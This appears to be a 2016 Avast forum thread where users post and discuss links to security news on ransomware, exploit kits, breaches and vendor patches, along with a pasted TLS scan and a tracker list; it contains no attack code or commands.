We recently encountered some exploits from Angler Exploit Kit (EK) that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7.
http://www.scmagazine.com/fireeye-finds-angler-evading-microsoft-emet-on-windows-7/article/501244/
-
Twitter - Keeping your account safe
https://blog.twitter.com/2016/keeping-your-account-safe
-
Do you like them to hack your IoT devices? What if NSA could hack into your pacemaker, your smart-fridge etc.
Read: https://www.recode.net/2016/6/11/11906856/nsa-spying-hacker-internet-of-things
Hackers like this and now seemingly surveillance state is interested too.
polonus
-
Netgear D6000 and D3600 contain hard-coded cryptographic keys and are vulnerable to authentication bypass
http://www.kb.cert.org/vuls/id/778696
-
Interesting read on how stuff works ... i guess it is similar over at avast lab
What’s The Deal With Threat Intelligence
https://labsblog.f-secure.com/2016/06/14/whats-the-deal-with-threat-intelligence/
Data analysis provides us with technical threat intelligence that we use to drive day-to-day activities. Our back ends process hundreds of gigabytes of data on a daily basis.
Something to think about for those that are impatient about detection being added to samples ... @Be Secure ;)
-
Microsoft Security Bulletin Summary for June 2016
https://technet.microsoft.com/en-us/library/security/ms16-jun
-
Adobe Security Bulletin - Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb16-18.html
-
T-Mobile Czech Republic ‘suffers data leak’
Over 1.5 million customer records at T-Mobile Czech Republic were stolen by one of its employees, according to local media.
In an official statement, T-Mobile admitted that an incident has taken place but refused to confirm the scale or provide details about what information, if any, was leaked.
It said that due to an ongoing police investigation, it is “unable to provide any additional specific information”.
Based on the fact that the investigation has been handed over to the Czech Police’s Unit for Combating Organized Crime, speculation has arisen in Czech media that the data leak has been massive.
It probably involved all 1.5 million T-Mobile customers, making it the largest known data breach ever in the Czech Republic.
http://www.welivesecurity.com/2016/06/17/t-mobile-czech-republic-suffers-data-leak/ (http://www.welivesecurity.com/2016/06/17/t-mobile-czech-republic-suffers-data-leak/)
-
Fresh hell for TalkTalk customers: TeamView trap unleashed
http://www.theregister.co.uk/2016/06/13/talktalk_teamviewer_customer_scam/
-
GitHub Security Update: Reused password attack
https://github.com/blog/2190-github-security-update-reused-password-attack
-
GoToMyPC Password Issues
http://status.gotomypc.com/incidents/s2k8h1xhzn4k
-
Retefe banking Trojan targets UK banking customers
https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customers
-
WordPress 4.5.3 Maintenance and Security Release
https://wordpress.org/news/2016/06/wordpress-4-5-3/
-
MIRCOP Ransomware Poses as Robbed Anonymous Member
A new strain of ransomware named MIRCOP poses as a robbed member of the Anonymous hacker group, asking users to give money back or have their files locked forever.
MIRCOP is one of the non-standard ransomware families that deviate from the regular modus operandi that most ransomware variants follow these days.
http://news.softpedia.com/news/mircop-ransomware-poses-as-robbed-anonymous-member-505677.shtml (http://news.softpedia.com/news/mircop-ransomware-poses-as-robbed-anonymous-member-505677.shtml)
-
Finding an ATM Skimmer: It pays to be paranoid!
https://www.linkedin.com/pulse/finding-atm-skimmer-pays-paranoid-benjamin-tedesco-gcih-pmp (https://www.linkedin.com/pulse/finding-atm-skimmer-pays-paranoid-benjamin-tedesco-gcih-pmp)
-
Nuclear Exploit Kit Shuts Down As Researchers Probe Its Infrastructure
http://news.softpedia.com/news/nuclear-exploit-kit-shuts-down-as-researchers-probe-its-infrastructure-505696.shtml (http://news.softpedia.com/news/nuclear-exploit-kit-shuts-down-as-researchers-probe-its-infrastructure-505696.shtml)
Even before the Angler Exploit Kit (EK) shut down operations towards the end of May and start of June, the Nuclear Exploit Kit was dead and gone, according to multiple sources in the security industry.
The Nuclear EK was one of the biggest sources of ransomware infections, being notorious for delivering the Locky ransomware, among many other threats.
The exploit kit was always popular, being one of the top five exploits kits in usage, but around April 30, multiple sources say they stopped seeing any type of activity from Nuclear's infrastructure as if someone had pulled the plug and never returned.
-
MIRCOP Ransomware Poses as Robbed Anonymous Member
A new strain of ransomware named MIRCOP poses as a robbed member of the Anonymous hacker group, asking users to give money back or have their files locked forever.
MIRCOP is one of the non-standard ransomware families that deviate from the regular modus operandi that most ransomware variants follow these days.
http://news.softpedia.com/news/mircop-ransomware-poses-as-robbed-anonymous-member-505677.shtml (http://news.softpedia.com/news/mircop-ransomware-poses-as-robbed-anonymous-member-505677.shtml)
http://blog.trendmicro.com/trendlabs-security-intelligence/instruction-less-ransomware-mircop-channels-guy-fawkes/
-
Why Ransomware Works: Arrival Tactics
http://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-arrival-methods/
-
ohooo :o
Google Found Disastrous Symantec and Norton Vulnerabilities That Are 'As Bad As It Gets'
http://fortune.com/2016/06/29/symantec-norton-vulnerability/
http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/
https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00
https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec
-
ohooo :o
Google Found Disastrous Symantec and Norton Vulnerabilities That Are 'As Bad As It Gets'
http://fortune.com/2016/06/29/symantec-norton-vulnerability/ (http://fortune.com/2016/06/29/symantec-norton-vulnerability/)
http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/ (http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/)
https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html (https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html)
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00 (https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00)
https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec (https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec)
I think my recommended protection is much better : http://bob3160.blogspot.com/2016/06/heres-my-version-of-best-security.html (http://bob3160.blogspot.com/2016/06/heres-my-version-of-best-security.html)
-
ohooo :o
Google Found Disastrous Symantec and Norton Vulnerabilities That Are 'As Bad As It Gets'
http://fortune.com/2016/06/29/symantec-norton-vulnerability/ (http://fortune.com/2016/06/29/symantec-norton-vulnerability/)
http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/ (http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/)
https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html (https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html)
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00 (https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00)
https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec (https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec)
I think my recommended protection is much better : http://bob3160.blogspot.com/2016/06/heres-my-version-of-best-security.html (http://bob3160.blogspot.com/2016/06/heres-my-version-of-best-security.html)
I think my recommended protection is much better as Bob's:Avast! Free Antivirus+Sandboxie Free+Windows Firewall+Winpatrol Free+Malwarebytes Anti-Malware free+Zemana AntiMalware Free+Unchecky+Malwarebytes anti-exploit Free+MCShield
-
200 k+ parked/expired domains abused to launch malvertised ads.
One of the biggest ongoing problems online,
remedied like when "shutting the stable door after the horse has bolted".
Re: https://blog.sucuri.net/2016/06/spam-via-expired-domains.html
So malvertisers are even sinkholing to distribute their malvertised ads.
Seems because some won't dicriminate between a legit and a fraudulous click. >:( :(
Read: https://blog.sucuri.net/2016/06/spam-via-expired-domains.html
pol
-
Why need Remote Desktop is need to disable: http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/ (http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/)
-
Top Russian Site Exposes Millions to Info-Stealing Malware
http://www.infosecurity-magazine.com/news/top-russian-site-exposes-millions (http://www.infosecurity-magazine.com/news/top-russian-site-exposes-millions)/
-
IoT hell started : https://threatpost.com/lizardstresser-iot-botnet-part-of-400gbps-ddos-attacks/119006/
aka every damn item in household and office with internet will become abused for DDOS ...
more with cameras https://threatpost.com/botnet-powered-by-25000-cctv-devices-uncovered/118948/
before with routers https://threatpost.com/lizard-squads-ddos-for-hire-service-built-on-hacked-home-routers/110341/
-
Feind hört mit, EU seeks paid web-trolls:
http://www.telegraph.co.uk/news/worldnews/europe/eu/9845442/EU-to-set-up-euro-election-troll-patrol-to-tackle-Eurosceptic-surge.html
polonus
-
Possibly millions of computers insecure due to a UEFI bug
http://www.theregister.co.uk/2016/07/04/lenovo_scrambling_to_get_a_fix_for_bios_vuln/
-
First came Petya, now comes Santana. Hope Avast is ready:
https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/ (https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/)
-
Locky ransomware starts up again its illegal activity of stealing money from their victims after a temporary inactivity since the end of May.Hope Avast! is ready:
http://securityaffairs.co/wordpress/48725/malware/locky-ransomware-back.html (http://securityaffairs.co/wordpress/48725/malware/locky-ransomware-back.html)
-
Zepto Ransomware Soars
http://www.infosecurity-magazine.com/news/zepto-ransomware-soars/ (http://www.infosecurity-magazine.com/news/zepto-ransomware-soars/)
Hope Avast! is ready.
-
Rather late US alerts for Symantec and Norton flaws.
Re: https://www.us-cert.gov/ncas/alerts/TA16-187A
European alerts already came on June 29th.
Surveillance and other interests over security?
Citizens to-day are a big nuisance factor for Big Gov and Big Corp? :o
polonus
-
Rather late US alerts for Symantec and Norton flaws.
Re: https://www.us-cert.gov/ncas/alerts/TA16-187A (https://www.us-cert.gov/ncas/alerts/TA16-187A)
European alerts already came on June 29th.
Surveillance and other interests over security?
Citizens to-day are a big nuisance factor for Big Gov and Big Corp? :o
polonus
https://forum.avast.com/index.php?topic=52252.msg1322132#msg1322132
-
New Alfa, or Alpha Ransomware from the same devs as Cerber
Security researcher BloodDolly recently discovered a new file encrypter called Alfa Ransomware, or Alpha Ransomware, which is from the developers of Cerber. As BloodDolly is still currently analyzing this ransomware, not much is known about this ransomware at this time. Preliminary reports, though, indicate that files encrypted by Alfa Ransomware are not decryptable.
http://www.bleepingcomputer.com/news/security/new-alfa-or-alpha-ransomware-from-the-same-devs-as-cerber/ (http://www.bleepingcomputer.com/news/security/new-alfa-or-alpha-ransomware-from-the-same-devs-as-cerber/) Hope avast! is ready for this when it come.
-
Were you affected by the Trillian blog and forum Data Breach Security Incident?
Read: https://www.trillian.im/help/trillian-blog-and-forums-security-incident/
pol
-
CryptXXX Ransomware Updated Avast! needs to gear up the Ransomware protection.
https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229
(https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229)
Update:Avast! sucessfully block it. :)
-
CryptXXX Ransomware Updated Avast! needs to gear up the Ransomware protection.
https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229
(https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229)
Update:Avast! sucessfully block it. :)
The important part of this post is:
Update:Avast! successfully blocks it.
-
Oops! TP-Link forgets to Renew and Loses its Domains Used to Configure Router Settings
http://thehackernews.com/2016/07/tp-link-router-setting.html
-
Could antivirus software make your computer less safe? Antivirus software is 'increasingly useless' and may make your computer less safe
http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning (http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning)
-
Could antivirus software make your computer less safe? Antivirus software is 'increasingly useless' and may make your computer less safe
http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning (http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning)
This article has been quoted before and isn't any more intelligent in it's diagnosis now that when it was first posted it in this forum. :(
-
Could antivirus software make your computer less safe? Antivirus software is 'increasingly useless' and may make your computer less safe
http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning (http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning)
This article has been quoted before and isn't any more intelligent in it's diagnosis now that when it was first posted it in this forum. :(
I think the whole idea of your AV making you less safe - the idea that you are safer without an AV is ridiculous.
-
Hi bob3160 and DavidR and BeSecure,
All forms of protection are being attacked once in a while using similar bogus arguments. The one time it is AV, another time it is script blocking.
The argument often heard is that it slows down the computer. Well it is an infection of sorts that really may slow down your computer or even bring it to a standstill or ruin it to "doorstopper status only". Script blocking may even make your browser act faster as there is less script to be loaded.
polonus
-
Hi bob3160 and DavidR and BeSecure,
All forms of protection are being attacked once in a while using similar bogus arguments. The one time it is AV, another time it is script blocking.
The argument often heard is that it slows down the computer. Well it is an infection of sorts that really may slow down your computer or even bring it to a standstill or ruin it to "doorstopper status only". Script blocking may even make your browser act faster as there is less script to be loaded.
polonus
Any way you slice it, the author is trying to make an uninformed point.
-
Apple devices held for ransom, rumors claim 40M iCloud accounts hacked
http://www.csoonline.com/article/3093016/security/apple-devices-held-for-ransom-rumors-claim-40m-icloud-accounts-hacked.html
-
GootKit Banking Trojan Receives Massive Update
http://news.softpedia.com/news/gootkit-banking-trojan-receives-massive-update-506181.shtml (http://news.softpedia.com/news/gootkit-banking-trojan-receives-massive-update-506181.shtml)
-
Pokemon-Go app built by a firm sponsored by the CIA, read:
https://www.theguardian.com/technology/2016/jul/11/pokemon-go-privacy-security-full-access-google-account
Could be a means for CIA surveillance spooks to get a royal way into your smartphone
through such new technology sponsored by them.
polonus
-
Pokemon-Go app built by a firm sponsored by the CIA, read:
https://www.theguardian.com/technology/2016/jul/11/pokemon-go-privacy-security-full-access-google-account (https://www.theguardian.com/technology/2016/jul/11/pokemon-go-privacy-security-full-access-google-account)
Could be a means for CIA surveillance spooks to get a royal way into your smartphone
through such new technology sponsored by them.
polonus
Not mine, no games. I leave that to the kids, grand kids and great grand kids. This sly old fox knows better. :)
-
Hi bob3160,
For the smart kiddie at your home, that insist to play the game.
Make it scare-free, safe and with security in mind, some tips:
play it on a cheap second phone, turn the real smartphone into a wifi-hotspot, set a VPN,
and play the game from the cheap one on a fake Google account.
No abuse there. By the way, if there is a satan, he doesn't bother with contracts in blood,
but simply has you accept his permissions in the Google Play store. ;D
Info credits leocusmus.
pol
-
Nasty hole in WordPress plug-in patched: http://www.theregister.co.uk/2016/07/12/nasty_session_stealing_hole_filled_in_wordpress_all_in_one_seo_plugin/
pol
-
SCADA malware caught infecting European energy company
http://www.theregister.co.uk/2016/07/12/scada_malware/ (http://www.theregister.co.uk/2016/07/12/scada_malware/)
-
Nymaim Ransomware-Downloader Spikes Big
http://www.infosecurity-magazine.com/news/nymaim-ransomware-deliverer-spikes/ (http://www.infosecurity-magazine.com/news/nymaim-ransomware-deliverer-spikes/)
Hope Avast! is ready for this ransomware
-
A new high for Locky
https://labsblog.f-secure.com/2016/07/13/a-new-high-for-locky/
-
Microsoft Security Bulletin Summary for July 2016
https://technet.microsoft.com/library/security/ms16-jul
-
Microsoft wins federal appeal over warrants for data held outside US
https://www.rt.com/usa/351052-microsoft-emails-ireland-server/
-
Avast Sandbox has a flaw of allowing access to the file system. This could allow ransomware to encrypt files even if it is running in the sandbox, the writeup I found online is here:
http://seclists.org/fulldisclosure/2016/Apr/68
-
Avast Sandbox has a flaw of allowing access to the file system. This could allow ransomware to encrypt files even if it is running in the sandbox, the writeup I found online is here:
http://seclists.org/fulldisclosure/2016/Apr/68
This is pretty old in security terms and related to Avast Free/Pro/IS/Premier versions, 11.x.x and even earlier for the Endpoint Protection versions 8.x.x.
Given that the latest avast that the latest versions of Avast Free/Pro/IS/Premier is at 12.1.x it would have to be confirmed if this is still in effect or resolved in the later versions.
-
Energy Grid Malware Bypasses Cyber and Physical Security
"Security researchers have discovered new malware designed to bypass traditional physical and cybersecurity which could be used in an attack to shut down an energy grid."
https://sentinelone.com/blogs/sfg-furtims-parent/ (https://sentinelone.com/blogs/sfg-furtims-parent/)
-
Trillian Blog and Forums Security Incident
https://www.trillian.im/help/trillian-blog-and-forums-security-incident/
-
Ubuntu Forums Hacked, 2 Million Users’ Details Stolen
http://www.omgubuntu.co.uk/2016/07/ubuntu-forums-hacked-2-million-usernames-stolen
http://distrowatch.com/dwres.php?resource=showheadline&story=946
-
New version of Petya Released. Fixes bug in Encryption Algorithm
http://www.bleepingcomputer.com/news/security/new-version-of-petya-released-fixes-bug-in-encryption-algorithm/ (http://www.bleepingcomputer.com/news/security/new-version-of-petya-released-fixes-bug-in-encryption-algorithm/)
A new version of the Petya disc-encrypting ransomware has been released that fixes a bug that previously caused some weakness in its encryption algorithm. According to Hasherezade, a security analyst for Malwarebytes, prior versions of the Petya ransomware were not properly implementing the Salsa20 encryption algorithm, which was used by the ransomware to encrypt the drive and for verifying that a correct ransom key was entered.
With this new version, the Petya developer's implementation of the Salsa20 algorithm has been fixed, which removes the previously exploitable weaknesses.
Hope Avast! ready for this ransomware.
-
Seems a concerted action against Tor ongoing: https://trac.torproject.org/projects/tor/ticket/19690
pol
-
Seeing a lot of examples where CloudFlare enabled websites won't resolve DNS.
Example found lately: https://sritest.io/
I get a Error 1001 Ray ID: 2c48982096d52c78 • 2016-07-18 20:14:28 UTC
DNS resolution error
Do not see a reverse DNS here: http://toolbar.netcraft.com/site_report?url=https://sritest.io
Also see here: http://www.dnsinspect.com/sritest.io/1468872908
Issue with the Comodo Certificate allthough it has been installed properly:sritest.io
This is not a Symantec certificate.
Please contact the Certificate Authority for further verification.
This server cannot be scanned for these vulnerabilities:
Heartbleed. See possible causes.
Poodle (TLS). See possible causes.
Info
BEAST
The BEAST attack is not mitigated on this server.
Certificate information
This server uses a Domain Validated (DV) certificate. No information about the site owner has been validated. Data is protected, but exchanging personal or financial information is not recommended.
Common name:
sni154156.cloudflaressl.com
SAN:
sni154156.cloudflaressl.com, *.alexamaster.com, *.denisha.review, *.funnelproducer.com, *.garnettrowand.xyz, *.ouemceeii.cf, *.platypuslovescrypto.party, *.privacyforjournalists.org.au, *.savingnh.com, *.sifoilxi.cf, *.skachat-besplatno-balloon.accountant, *.sritest.io, *.superagency.ru, *.tadra.us, *.thingsandservices.com, *.whitehatmatrix.com, alexamaster.com, denisha.review, funnelproducer.com, garnettrowand.xyz, ouemceeii.cf, platypuslovescrypto.party, privacyforjournalists.org.au, savingnh.com, sifoilxi.cf, skachat-besplatno-balloon.accountant, sritest.io, superagency.ru, tadra.us, thingsandservices.com, whitehatmatrix.com
Valid from:
2016-Jul-18 00:00:00 GMT
Valid to:
2017-Jan-22 23:59:59 GMT
Certificate status:
Valid
Revocation check method:
OCSP
Organization:
Organizational unit:
PositiveSSL Multi-Domain,Domain Control Validated
City/locality:
State/province:
Country:
Certificate Transparency:
Not embedded in certificate
Serial number:
2edd615acf8a11663b75fe0037e2d6d7
Algorithm type:
SHA256withECDSA
Key size:
256
Certificate chainShow details
COMODO ECC Certification AuthorityIntermediate certificate
COMODO ECC Domain Validation Secure Server CA 2Intermediate certificate
sni154156.cloudflaressl.comTested certificate
Server configuration
Host name:
104.24.122.240
Server type:
cloudflare-nginx
IP address:
104.24.122.240
Port number:
443
Protocols enabled:
TLS1.2
TLS1.1
TLS1.0
Protocols not enabled:
SSLv3
SSLv2
Secure Renegotiation:
Enabled
Downgrade attack prevention:
Enabled
Next Protocol Negotiation:
Enabled
Session resumption (caching):
Enabled
Session resumption (tickets):
Enabled
Strict Transport Security (HSTS):
Not Enabled
SSL/TLS compression:
Not Enabled
Heartbeat (extension):
Not Enabled
RC4:
Not Enabled
OCSP stapling:
Not Enabled
comodo scan gives: E-commerce Safety Information
Transaction Protection
Analysis has failed to complete. Sorry, The connection timed out before all (any?) content was returned! (Note: As a part of their security measures some shared hosting services will block this type of tool from scanning the sites they host. -- some things to try
Scripts resolve normally: https://seomon.com/domain/sritest.io/performance/
Just does not like the oversight at these large cloud blulk hosters, (my remark - pol).
Is this because of recently found cgi vulnerabilities in certain applications, and has this to be mitigated? Anyone?
polonus (volunteer website security analyst and website error-hunter)
-
Work-arounds for particular server applications exist: https://httpoxy.org/ - read -> https://www.kb.cert.org/vuls/id/797896
polonus
-
Lot of tracking going on in my Google Chrome Browser:
We found 38 data collectors in Chrome tracking, saving and often selling your browsing.
Here is a list of the trackers we found (data collectors, ad networks, widgets & others):
AdF.ly Adzerk Alexa bitly
Google Disqus DoubleClick Feedjit
Flattr Foursquare Imgur Impact Radius
LinkedIn Marin Software Microsoft adCenter Microsoft
Netmining Omniture (Adobe) Pinterest Po.st
Mail.ru Reddit Sanoma ShareASale
Skimbit Ltd SoundCloud TradeDoubler Twitter
Tynt UserVoice Vkontakte Yandex
Zippyshare Platform161 MixPanel Taboola
Wordpress Olark
How to keep them at bay?
polonus
-
How does this effect Avast ???
http://www.theregister.co.uk/2016/07/20/hooks_cooked_hackers_crack_tonnes_of_security_apps_for_new_cloak_yoke/ (http://www.theregister.co.uk/2016/07/20/hooks_cooked_hackers_crack_tonnes_of_security_apps_for_new_cloak_yoke/)
-
How does this effect Avast ???
http://www.theregister.co.uk/2016/07/20/hooks_cooked_hackers_crack_tonnes_of_security_apps_for_new_cloak_yoke/ (http://www.theregister.co.uk/2016/07/20/hooks_cooked_hackers_crack_tonnes_of_security_apps_for_new_cloak_yoke/)
I've found my own answer:
EnSilo identified affected products from AVG, Kaspersky Lab, McAfee/Intel Security, Symantec, Trend Micro, Bitdefender, Citrix, Webroot, Avast, Emsisoft and Vera Security.
Now the question is how quickly will this get patched ???
-
Oracle Critical Patch Update Advisory - July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
-
Chinese authorities want to ban adblockers from September henceon:
https://adblockplus.org/blog/the-lonely-bully-china-issues-edict-to-ban-ad-blockers
polonus
-
Chinese authorities want to ban adblockers from September henceon:
https://adblockplus.org/blog/the-lonely-bully-china-issues-edict-to-ban-ad-blockers
polonus
Irony of ironies when the country that blocks mega quantities of data would want to block a blocker :P
-
Chinese authorities want to ban adblockers from September henceon:
https://adblockplus.org/blog/the-lonely-bully-china-issues-edict-to-ban-ad-blockers
polonus
so, this is reason why Chinese company bought Opera ...
guess that new innovative feature goes bust in month
-
so, this is reason why Chinese company bought Opera ...
http://www.reuters.com/article/us-opera-software-m-a-china-idUSKCN0ZY0CA
-
that was the first offer for 1.2 billion what failed
the second offer is already ongoing and it's what I'm talking about (600 millions one)
they still buying the browsers if it goes thru ...
-
MS-ISAC official: Ransomware top priority
http://www.scmagazine.com/gov-agencies-beware-malware-infections-peaked-at-450-per-month/article/511381/ (http://www.scmagazine.com/gov-agencies-beware-malware-infections-peaked-at-450-per-month/article/511381/)
-
New attack bypasses HTTP protection. Danger imminent on open Wifi platforms
re: http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/
polonus
-
New attack bypasses HTTP protection. Danger imminent on open Wifi platforms
re: http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/ (http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/)
polonus
Open WiFi has it's own insecurities, it really doesn't need any help. :)
-
Hi bob3160,
That is why we have avast mobile security to warn us
for such wifi Web Proxy Auto Discovery connections, that may pose a threat.
The Open Wifi "PAC-man" cannot eat (and/or steal) our data or maliciously redirect us.
polonus
-
Here is a reply from LastPass about the latest discovered vulnerability:
https://blog.lastpass.com/2016/07/lastpass-security-updates.html/ (https://blog.lastpass.com/2016/07/lastpass-security-updates.html/)
More about the vulnerability here:
http://www.theregister.co.uk/2016/07/27/zero_day_hole_can_pwn_millions_of_lastpass_users_who_visit_a_site/ (http://www.theregister.co.uk/2016/07/27/zero_day_hole_can_pwn_millions_of_lastpass_users_who_visit_a_site/)
How does Avast Password stack up ???
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
http://www.lifehacker.com.au/2016/06/keepass-vulnerability-lets-attackers-steal-passwords-but-dont-expect-it-to-be-patched/
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
http://www.lifehacker.com.au/2016/06/keepass-vulnerability-lets-attackers-steal-passwords-but-dont-expect-it-to-be-patched/
Nice. I am using the portable version 1.31.0.0 which checks for updates at startup (if checked). The article states 2.0 but I am going to turn off this update check right now.
I would also think that the redirection and unsigned/unknown file should be detected by avast.
Thanks
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
http://www.lifehacker.com.au/2016/06/keepass-vulnerability-lets-attackers-steal-passwords-but-dont-expect-it-to-be-patched/
please stop posting this, already been debunked as non-security issue and is used only by competing password managers to showcase 'insecurity' in the other free product
http://keepass.info/help/kb/sec_issues.html#updsig
and already not an issue in new version either ...
-
First we postedon the HTTPS URLS Sniffing with mal PAC files Threat, now there is a solution to be applied quite easily:
http://www.contextis.com/resources/blog/leaking-https-urls-20-year-old-vulnerability/
polonus
-
Deleted WhatsApp chats not gone from the database on your device.
Weird the chats in the database are not encrypted.
Read: http://www.zdziarski.com/blog/?p=6143
Certain restore Apps already able to recover deleted WhatsApp data: FonePaw/Reincubate
If you mean Privacy, do not use WhatsApp.
When you really wanna loose the data uninstall Whatsapp or use a complex back-up password.
Remember in these times and days, never entrust the Internet with private or other info you do not intend to share with the world.
The Internet never forgets and all your data will be there forever and a day.
Know Google and others sits on them info and where it goes no-one knows,
so they even might to come to boomerang and bite you back.
Forewarned is forearmed,
polonus
-
Does Avast Mobile Security protects us against these 155 new trojaned apps from Google Play?
Read: https://news.drweb.com/show/?i=10115&lng=en&c=5
Anyone?
polonus
-
Kaspersky's apologies for ad that should not have been shown:
https://twitter.com/antireality/status/758998526990823426
polonus
-
Kaspersky's apologies for ad that should not have been shown:
https://twitter.com/antireality/status/758998526990823426 (https://twitter.com/antireality/status/758998526990823426)
polonus
I'm ssurprised that they didn't try to rename Kaspersky to Cialis or Viagra ??? :)
-
Curiosity killed the proverbial animal aka how almost anybody could become a victim of phishing:
Read: https://www.blackhat.com/us-16/briefings.html#exploiting-curiosity-and-context-how-to-make-people-click-on-a-dangerous-link-despite-their-security-awareness
And that is why, my good forum friends, it is good I have avast online security beta extension installed in the browser.
Furthermore I report the baddies directly to avast, and also analyze them in the virus and worms section as a volunteer website security analyst
and website error-hunter.
Whenever I see something that is not alerted and should be blocked I use this extension in Google Chrome;
Block site 3.1.11
Stay focused and let Block Site automatically blocks websites of your choice. Best for procrastination problem
Details Options
Id: eiimnmioipafcokbfikbljfdeojpcgbh Really like that one, just blocked flavors.me & subdomains as a SE redirector.
Next to that I work Bitdefender TrafficLight and also report blockables to WOT (under another nick).
Don't fall for it, folks, just think before opening that link. I always check and click, especially when coming there the first time around.
polonus
-
Drep detection whenever i download an executable from my own website. It a clean software i made by own. but why this detection occurring? can any body tell me how to avoid it?
-
Drep detection whenever i download an executable from my own website. It a clean software i made by own. but why this detection occurring? can any body tell me how to avoid it?
As you're a developer, read here:
-> https://www.avast.com/faq.php?article=AVKB229
-> https://www.avast.com/faq.php?article=AVKB228
-
Attention: Some Fosshub downloads compromised
http://www.ghacks.net/2016/08/03/attention-fosshub-downloads-compromised/
More :
http://news.softpedia.com/news/hacker-compromises-fosshub-to-distribute-mbr-hijacking-malware-506932.shtml
-
Cisco report says growing ransomware attacks are costing people and businesses millions
Cisco security researchers also discovered a sharp increase in HTTPS traffic related to malicious activity between September 2015 and March 2016. The increase is due in large part to malicious ad injectors and adware. (Bold is mine). Researchers also observed that even though major software vendors make patches available, many users failed to quickly install the patches, giving hackers plenty of time to exploit vulnerabilities.
http://www.bizjournals.com/sanjose/news/2016/08/01/cisco-report-says-growing-ransomware-attacks-are.html (http://www.bizjournals.com/sanjose/news/2016/08/01/cisco-report-says-growing-ransomware-attacks-are.html)
-
HEIST
yet another attack vs HTTPS, this time also works vs HTTP/2
http://arstechnica.com/security/2016/08/new-attack-steals-ssns-e-mail-addresses-and-more-from-https-pages/
http://www.scmagazine.com/heist-attack-on-ssltls-can-grab-personal-info-black-hat/article/514203/
details https://tom.vg/papers/heist_blackhat2016.pdf
-
New Remcos RAT Available for Sale on Underground Hacking Forums
http://news.softpedia.com/news/new-remcos-rat-available-for-sale-on-underground-hacking-forums-507018.shtml
-
Recent Hacks on Forums Show Platforms Remain Vulnerable to Fundamental Exploits
http://www.trendmicro.no/vinfo/no/security/news/vulnerabilities-and-exploits/recent-hacks-on-forums-show-platforms-remain-vulnerable-to-fundamental-exploits
-
Hitler Ransomware :o
http://news.softpedia.com/news/hitler-ransomware-infects-everyone-not-just-the-jews-507123.shtml (http://news.softpedia.com/news/hitler-ransomware-infects-everyone-not-just-the-jews-507123.shtml)
Two days ago, AVG security researcher Jakub Kroustek discovered a quite originally named ransomware variant called the Hitler Ransomware (actually Ransonware but the grammar Nazi lying in me could not let that pass) that deletes your files as a result of bad coding.
